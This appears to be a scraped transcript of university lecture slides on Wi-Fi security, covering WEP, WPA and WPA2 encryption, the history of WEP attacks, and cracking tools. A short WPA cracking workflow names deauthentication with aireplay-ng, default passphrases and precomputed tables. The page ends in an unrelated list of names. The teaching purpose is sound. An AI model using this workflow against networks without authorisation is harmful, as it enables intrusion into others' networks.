Dr. Igor Santos

Security of InformationSystemsWi-Fi Security Dr. Igor Santos

Contents • Introduction to Wi-Fi networks • Encryption • WEP • WPA • Vulnerabilities • Attacks • Setting up a secure Wi-Fi network • Captive Portals

Introducción a las redes Wi-Fi

IntroductiontoWi-Fi networks • Whatis a Wi-Fi? • Set of interconnected computers through a Wireless "bridge / router" or Access Point • Main devices in a Wi-Fi network • Network cards • Access Points and Access Points (AP) • Antennas

IntroductiontoWi-Fi networks • Typicaltopology

Wi-Fi networkcards

Wi-Fi networkcards • Modes • Ad-hoc: interconnectionbetween devices without the need for an AP • It is similar to point-to-point connection via crossover ethernet cable (however, several PCs can be connected ad-hoc) • AP manages the media → increased collisions → lowers performance

Wi-Fi networkcards • ManagedorInfrastructure: connected to an AP that manages connections (STA <> AP) • The card leaves all responsibility to the AP to manage traffic • Sometimes it is necessary to know the ESSID (network id) of the network that manages the AP to access → detect it by entering monitor mode.

Wi-Fi networkcards • Master: as an AP, providesservice and managestheconnections(AP <> STA) • PCs can be converted into APs • HostAP: http://hostap.epitest.fi • Advantages • A PC is much more powerful than an AP, many possibilities (filtering, security enhancements, routing, DHCP ...) • Recycling of obsolete equipment, cheap APs • Shortcomings • Not all cards can work in Master mode (Prism / Hermes / Atheros).

Wi-Fi networkcards • Monitor: allowstoto capture packets without associating with an AP or ad-hoc network • Monitors a specific channel without transmitting packets (passively) • The card does not check the packet CRC's • Itis NOT THE SAME as promiscuousmode • Promiscuous: in LAN networks, connected • Monitor: inWiFinetworks, notconnected • Not all cards support monitor mode • http://kmuto.jp/debian/hcl/index.cgi • http://linux-wless.passys.nl

Access Points

Wi-Fi Access Points • Interconnects Ethernet LANs with wireless users or networks • Alternatives • CommercialAPs • Commercial APs with free software • APscomerciales con software libre • Install Custom Firmware on commercial AP • “Homemade” APs • Obsolete PC + WiFi card in Master mode

Wi-Fi Access Points • Functionalities • They manage the physical media • They selectively retransmit data • They may have additional services • DHCP • Remote management (web, telnet, ssh) • IP, MAC, etc.. filtering

Wi-Fi Access Points • Concepts • BSSID (Basic Service Set Identifier) • Unique address that identifies the AP that creates the wireless network • MAC address • ESSID (Extended Service Set Identifier) • Unique name of up to 32 characters to identify the wireless network

Wi-Fi Access Points • Channel • Wi-Fi works in the2.4GHz bandwith • Itisdivided in 13 channelsof22 Mhz • Different frequency ranges within that band • Theyoverlap-> Interferences! • Recommendation • Use channels of 1, 6 and 11 so they do not overlap each other

Wi-Fi Access Points

Wi-Fi antennas

Wi-Fi antennas • They manage to increase the coverage and performance of a wireless node • Severalscenarios • AP inside a building • Exterior APs • Point to point connection • Point-to-multipoint • Hot-spot

Wi-Fi antennas • There are different types of antennas • Omnidirectional • In all directions • Ideal for APs or hot-spots • Directives • Towards a direction or a small sector • Ideal for: • Users of an AP • Interconnection LAN-to-LAN

Wi-Fi antennas • Homemadeantennas

Encryption

WEP Encryption • WEP (WiredEquivalentPrivacy) • Included in the 802.11 standard • Protection based on the RC4 algorithm • Use keys of 64, 128 and 256 bits (actually 40, 104 or 232 bits: because Initialization Vector - IV = 24 bits, different in each package) • The key may be generated from a passphrase or entered directly by the user • The key must be known to all clients (shared secret)

WPA Encryption • WPA (Wi-Fi Protected Access) • Workaround prior to 802.11i (WPA2) • Improvementsover WEP • Dynamickeydistributionwithlimitedduration (TKIP - Temporal Key IntegrityProtocol) • HarderInitialization Vector: 48 bits, minimizingkeyreuse • Integrity: from ICV (IntegrityCheckValue) to MIC (Michael): basedontheencryptionkey

WPA Encryption • Dos modalities • Personal -WPA (PSK) • Thoughfor simple environments • Pre-Shared Key (PSK): sharedsecret • WPA-Enterprise (RADIUS) • Thoughforcomplexenvironments • Everyuser has his/herlogin/password • 802.1x • Supplicant (STA) • Authenticator (AP) • Auth server (RADIUS)

802.11i (WPA2) Encryption • WPA2 • Approved by the IEEE and accepted by Wi-Fi Alliance in 2004 • Also known as 802.11i or RSN (Robust Security Network) • Improvements • 802.1x-based authentication • AES-based encryption • Dynamic key management (GKH, PKH) • Support for ad-hoc networks

PORTADA VULNERABILIDADES Wi-Fi vulnerabilities

Wi-Fi vulnerabilities • WiFi networks have the sameproblems / bugs / vulnerabilities than wired networks • Besides, they have additional problems related to its wireless features • Radio Scanners • Radio jamming (DoS) • Flexibility vs. Security ...

Wi-Fi vulnerabilities • vulnerabilities • Access: wardriving • WEP Encryption: Attackslike FSM, KoreK, etc • WPA and WPA2 Encryption: DictionaryAttracks • Man-in-the-Middle Attacks • Rogue APs • Vulnerabilities in APswhen "bridge“ mode: ARP Poisoning • Denial of Service(DoS)

WEP vulnerabilities

WEP vulnerabilities • Walker (Intel) (2000) • "WEP is not a good way to provide privacy for wireless communications" • Using a stream cipher algorithm (RC4) in an environment in which the keys are repeated a mistake • Main problem -> Initialization Vectors • If the Initialization Vectors are repeated and we know lots of plaintext is easy to break the encryption

WEP vulnerabilities

WEP vulnerabilities • Borisov et al. (2001) • Alphabet Building Attack (the "keystream" is derivable by a known plaintext attack) • Arbaugh (2001) • Attack "Inductive Chosen Plain Text" (build a Databsewith all the "keystreams" for a WEP key in a relatively short time) • Fluhrer, Mantin, Shamir (2001) • “Weaknesses in the Key SchedulingAlgorithm of RC4” (few bits determine many bits in the first permutation algorithm)

WEP vulnerabilities • KoreK (2004) • “KoreK Attacks”: set of enhancements to the attack FMS - Fluhrer, Mantin, Shamir (2001) • Only about 200,000 Initialization Vectors are needed • "Attack chop-chop": Reverse Inductive Attack (Arbaugh 2001) • It sends an encrypted ARP request to the AP with one byte less • The AP will repeat only those packets that verify the CRC • After 256 attempts, it will find the valid byte of that particular iteration • Requests can be send in parallel(more speed) • Gradually all the "keystream“ can be derived

WEP vulnerabilities • Reinjection of packetstogenerate new traffic (new InitializationVectors) • ARP requests • ICMP Traffic • DHCP requests

WEP vulnerabilities • Klein (2005) • Improvements to the correlations found by FMS and RC4 KoreK • Bittau et al. (2006) • Packet fragmentation attack between STA and AP • Ramachandran y Ahmad (2007) • “Caffe-latteattack” (gettingtheuserkey, notthe AP one) • Hirte (2007) • Improved "caffe-latte attack" (no need for ARPs)

WEP vulnerabilities • Tews, Weinmann, Pyshki (2007) • “Breaking 104-bit WEP in lessthan 60 seconds” (improvedKoreK’sapproachbyusingthecontributionfrom Klein) • Performance • 50% successwith 40.000 InitializationVectors • 95% successwith 85.000 InitializationVectors • Beck y Tews (2008) • ImprovementsfromtheapproachesbyTews, Weinmannand Pyshki(reduces the number of needed packages from 90000-40000 to 24,000 )

WEP attacks • WEP cracking • Capture traffic that contains Initialization Vectors (NOT Beacon Frames) • If there are no users connected to the AP, then the traffic cannot be generated • FakeAssociation • If there is no much traffic • Reinject • Use one of themethods(Korek, …) toobtainthekey

WEP attacks • Bruteforce • ForWEP40, isreasonable • 240 • On a Pentium Core2Duo: 42 days (300,000 K / S) • In a cluster of FPGAs: 13 minutes (1.386M K / S) • ForWEP104, IT IS NOT • 2104 = 20 x 1030 • On a Pentium Core2Duo: 2.14 trillion years • In a cluster of FPGAs: 464 billion years • Dictionary attacks • Keysalready brokenin other APs • Default keys

WEP attacks • Many manufacturers configure default WEP • ESSID recognizable as WLAN_XXor equivalent • Deductible WEP passphrase generated according to: • A common prefix for each manufacturer • BSSID • The XX WLAN_XX • Other unknown data • You can try brute force the 16,384 possibilities • WlanDecrypter generates these possible keys depending on the BSSID and ESSID • Only one encrypted packet capture is needed • WlanInject to generate a false association if there is no traffic

Tools for cracking WEP • GNU/Linux Tools • aircrack, aircrack-ng • Continuousdevelopment • Highlyrecommended • WepLab • Centeredin WEP, fewupdates • GUI (wxWepLab) • Assistants • Airoscript • wesside-ng y easside-ng • spoonwep2.

Tools for cracking WEP • Tools forMicrosoft Windows • Privative Software • CommViewforWiFi (TamoSoft) • OmniPeek (WildPackets) • AirMagnetWiFiAnalyzer (AirMagnet)

Tools for cracking WEP • Ports of free software (partial functionality) • Portsde software libre (parcial functionality ) • airsnort: obsolete • WepLab • Doesn’t support Windows capture • Required Wireshark or other capture programs • aircracky aircrack-ng • Currently widely used • Capture and reinjection with some drivers

Conclusions WEP • A few years ago it was said that WEP was bad, but better than nothing • Today it is almost the opposite: • Protecting a network with WEP makes it easy to crack because it is a challenge very accessible to casual crackers • There are security protocols, so WEP should be discarded ALWAYS

WPA-PSK vulnerabilities

WPA-PSK vulnerabilities • WPA-PSK vulnerabilities • The system used by WPA for the exchange of information used for the key generation is weak • Preset Keys are "unsafe" (WPA-PSK) • Subject to dictionary attacks • No need to capture lots of traffic, capture only key exchange

WPA vulnerabilities • Capture initialhandshake • 4 packets WPA from user authentication against an AP • de autenticación de un cliente contra un AP • Brute force or dictionary attackto extract the key • Success depends on the dictionary • Éxito depende del diccionario • It is also possible to use Rainbow Tables

WPA attacks • Many manufacturers configure default WPA • ESSIDrecognizable • WLAN_XXXX • JAZZTEL_XXX • BSSID alsoneeded • Online Tools • http://www.seguridadwireless.net/wpamagickey1.php • http://www.seguridadwireless.net/wpamagickey.php

Tools for cracking WPA-PSK • CoWPAtty • In its fourth version cracks WPA2 • There are "rainbow tables" of the most common challenges (English) for common ESSIDs (linksys, tsunami, comcomcom, etc..) • wpa_crack • Proof of concept • SpoonWpa • GUI assistant • wpacracker.com • Cracking WPA usingcloudcomputing (17 US$)

WPA Cracking Workflow • WPA_XXXX / JAZZTEL_XXXX? • http://www.seguridadwireless.net/wpamagickey1.php • http://www.seguridadwireless.net/wpamagickey.php • Test default passphrase“12345670” • WPA-PSK? • ObtaintheESSID • Obtainauthentication: • De authenticate: aireplay-ng -0 • Pre-computedtablesforthatESSID • Crack: aircrack-ng, cowpatty

WPA Cracking Workflow • Withouttablesforthat ESSID • Generatetables: genpmk(in parallelifpossible) • Goto 3

Dr. Igor Santos

Dr. Igor Santos

Presentation Transcript

Dr. Igor Santos

Dr. Igor Santos

Dr. Igor Santos

Dr. Igor Santos

Biljana Stojković Mentor: Prof. Dr Igor Poberaj

Igor Stravinsky

Igor Stravinsky

Dr. Igor Paramonov, Instructor

Dr. Igor Protsenko ,

Igor Soszyński

Igor Sharakhov

Santos

Igor Stravinsky

Igor Budak

Igor Sikorsky

Project A8 SME Interoperability in Practice Igor Santos, European Software Institute

Igor Stravinsky

Igor Stravinsky

Igor Stravinsky